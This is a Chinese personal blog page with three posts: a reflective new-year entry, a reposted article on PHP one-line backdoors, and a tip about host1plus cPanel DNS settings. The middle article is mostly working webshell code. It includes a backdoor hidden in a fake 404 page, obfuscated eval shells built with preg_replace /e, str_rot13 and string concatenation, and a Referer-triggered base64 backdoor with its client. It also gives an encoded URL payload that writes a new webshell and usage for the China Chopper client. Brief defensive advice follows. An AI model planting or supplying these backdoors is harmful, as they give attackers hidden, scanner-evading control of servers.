相信

「人是生而自由的」

「但无往不在枷锁之中。」

「自以为是其他一切主人的人,反而比其他一切更是奴隶。」

标签: 中国

你想听我说吗

(1) 

这是14年的第一更,能再给你拜个年?祝你幸福指数无穷大。

是个幻觉,指尖一直想往04年敲下去,2004年呐。

 

(2)

13年下半年就较少更新,曾经也陆陆续续坚持三年多的更新,曾经一想到写日志思绪就停不住,曾经写分享做记录都让我心情愉悦有加。

是年纪的增长让我更加缄默,还是走过的路更多而让我不敢妄言。

 

(3)

在这个精神载体,越来越多的SPAM也随之沉淀,放之任之,可能你的留言湮没在里头。

朋友们需要联系的还请邮件呀。

 

(4)

去年的他,他的今年。

电子商务 - FP - 黑帽 - LINUX - 网站 - 通道 - 51.LA - SHELL - 转换率 - 排名 - 产品 - 股票 - ?

似乎这些元素就是全部,就是他的每一天。

你好吗?你快乐吗?你自由吗?

 

(5)

探索与发现

行知

思考与改变(?)

 

(6)

自我精神上的禁锢才是最大的元凶?

说走就走不是不敢 | 不行,而是不能?

精神和身体都能走在路上?

 

(7)

我缺的是勇气和不顾一切。

 

我说什么了?

标签: none

那些强悍的PHP一句话后门[转]

http://www.cmdhk.net/?p=228

我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。

强悍的PHP一句话后门

这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。

利用404页面隐藏PHP小马:

01<!DOCTYPE HTML PUBLIC  "-//IETF//DTD HTML 2.0//EN" > 
02<html><head> 
03<title>404 Not Found</title> 
04</head><body> 
05<h1>Not Found</h1> 
06<p>The requested URL was not found on this server.</p> 
07</body></html> 
08<?php 
09@preg_replace( "/[pageerror]/e" , $_POST [ 'error' ], "saft" ); 
10header( 'HTTP/1.1 404 Not Found' ); 
11?>

 

404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。

无特征隐藏PHP一句话:

1     <?php 
2session_start(); 
3$_POST [ 'code' ] &&  $_SESSION [ 'theCode' ] = trim( $_POST [ 'code' ]); 
4$_SESSION [ 'theCode' ]&&preg_replace( '\'a\'eis' , 'e' . 'v' . 'a' . 'l' . '(base64_decode($_SESSION[\'theCode\']))' , 'a' ); 
5?>

 

将$_POST['code']的内容赋值给$_SESSION['theCode'],然后执行$_SESSION['theCode'],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。

超级隐蔽的PHP后门:

1<?php  $_GET [a]( $_GET [b]);?>

 

仅用GET函数就构成了木马;

利用方法:

    ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。

层级请求,编码运行PHP后门:
此方法用两个文件实现,文件1

1     <?php 
2//1.php 
3header( 'Content-type:text/html;charset=utf-8' ); 
4parse_str ( $_SERVER [ 'HTTP_REFERER' ],  $a ); 
5if (reset( $a ) ==  '10' &&  count ( $a ) == 9) { 
6eval ( base64_decode ( str_replace ( " " ,  "+" , implode( array_slice ( $a , 6))))); 
7
8?>

文件2

01     <?php 
02//2.php 
03header( 'Content-type:text/html;charset=utf-8' ); 
04//要执行的代码 
05$code = <<<CODE 
06phpinfo(); 
07CODE; 
08//进行base64编码 
09$code =  base64_encode ( $code ); 
10//构造referer字符串 
11$referer =  "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=" ; 
12//后门url 
14$ch = curl_init(); 
15$options =  array ( 
16CURLOPT_URL =>  $url , 
17CURLOPT_HEADER => FALSE, 
18CURLOPT_RETURNTRANSFER => TRUE, 
19CURLOPT_REFERER =>  $referer
20); 
21curl_setopt_array( $ch ,  $options ); 
22echocurl_exec( $ch ); 
23?>

 

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果,一般waf对referer这些检测要松一点,或者没有检测。用这个思路bypass waf不错。

PHP后门生成工具weevely

weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。

weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作为检查规则的eval,system等函数都不会直接出现在代码中,从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描,结果显示该文件无任何威胁。

以上是大概介绍,相关使用方法亦家就不在这介绍了,简单的科普一下。

三个变形的一句话PHP木马
第一个

1<?php ( $_ =@ $_GET [2]).@ $_ ( $_POST [1])?>

 

在菜刀里写http://site/1.php?2=assert密码是1

第二个

1     <?php 
2$_ = "" ; 
3$_ [+ "" ]= '' ; 
4$_ = "$_" . "" ; 
5$_ =( $_ [+ "" ]| "" ).( $_ [+ "" ]| "" ).( $_ [+ "" ]^ "" ); 
6?> 
7<?php ${ '_' . $_ }[ '_' ](${ '_' . $_ }[ '__' ]);?>

 

在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。

第三个

1( $b4dboy =  $_POST [ 'b4dboy' ]) && @preg_replace( '/ad/e' , '@' . str_rot13 ( 'riny' ). '($b4dboy)' ,  'add' );

 

str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果,让人吐血!

最后列几个高级的PHP一句话木马后门:

01     1、 
02$hh =  "p" . "r" . "e" . "g" . "_" . "r" . "e" . "p" . "l" . "a" . "c" . "e" ; 
03$hh ( "/[discuz]/e" , $_POST [ 'h' ], "Access" ); 
04//菜刀一句话 
052、 
06$filename = $_GET [ 'xbid' ]; 
07include ( $filename ); 
08//危险的include函数,直接编译任何文件为php格式运行 
093、 
10$reg = "c" . "o" . "p" . "y" ; 
11$reg ( $_FILES [MyFile][tmp_name], $_FILES [MyFile][name]); 
12//重命名任何文件 
134、 
14$gzid =  "p" . "r" . "e" . "g" . "_" . "r" . "e" . "p" . "l" . "a" . "c" . "e" ; 
15$gzid ( "/[discuz]/e" , $_POST [ 'h' ], "Access" ); 
16//菜刀一句话 
175、 include ( $uid ); 
18//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif 
19//gif插一句话 
206、典型一句话 
21程序后门代码 
22<?php eval_r( $_POST [sb])?> 
23程序代码 
24<?php @eval_r( $_POST [sb])?> 
25//容错代码 
26程序代码 
27<?php assert( $_POST [sb]);?> 
28//使用lanker一句话客户端的专家模式执行相关的php语句 
29程序代码 
30<? $_POST [ 'sa' ]( $_POST [ 'sb' ]);?> 
31程序代码 
32<? $_POST [ 'sa' ]( $_POST [ 'sb' ], $_POST [ 'sc' ])?> 
33程序代码 
34<?php 
35@preg_replace( "/[email]/e" , $_POST [ 'h' ], "error" ); 
36?> 
37//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 
38程序代码 
39<O>h=@eval_r( $_POST1 );</O> 
40程序代码 
41<script language= "php" >@eval_r( $_POST [sb])</script> 
42//绕过<?限制的一句话

 

综上,这些PHP一句话后门可谓五脏俱全,一不小心您肯定中招了,而我们今天这篇文章的重中之重在哪呢?重点就在下边的总结!

如何应对PHP一句话后门:

我们强调几个关键点,看这文章的你相信不是门外汉,我也就不啰嗦了:

 

    1,对PHP程序编写要有安全意识2,服务器日志文件要经常看,经常备份3,对每个站点进行严格的权限分配4,对动态文件及目录经常批量安全审查5,学会如何进行手工杀毒《即行为判断查杀》6,时刻关注,或渗入活跃的网络安全营地7,对服务器环境层级化处理,哪怕一个函数也可做规则

我们认为当管理的站点多了,数据量大时,我们应合理应用一些辅助工具,但不应完全依赖这些工具,技术是时刻在更新进步的,最为重要的是你应学会和理解,编写这些强悍后门的人所处思维,角色上的换位可为你带来更大的进步。

标签: php, 一句话

host1plus使用第三方DNS问题

host1plus cpanel的主机不是main domain要
Addon Domains的时候,如果不是指向他们的DNS的话会一直提示:

Sorry, you are not allowed to park common domains. 
Sorry, the domain is already pointed to an IP address that does not \nappear to use DNS servers associated with this server. Please transfer the domain to \nthis servers nameservers or have your administrator add one of its nameservers to /etc/ip.remotedns and make the proper A entries on that remote nameserver.

导致添加失败!

需要修改域名的DNS为:

ns1.lion.host1plus.com
ns2.lion.host1plus.com

或者

ns1.host1plus.com 
ns2.host1plus.com

非要使用第三方DNS的话等Addon Domains成功了再修改回去。

 

另外如果是WHM平台的话,可以改下System config -> Tweak Settings 的配置,允许使用远程DNS。

 

狗日的host1plus,麻烦死了!

标签: host1plus, DNS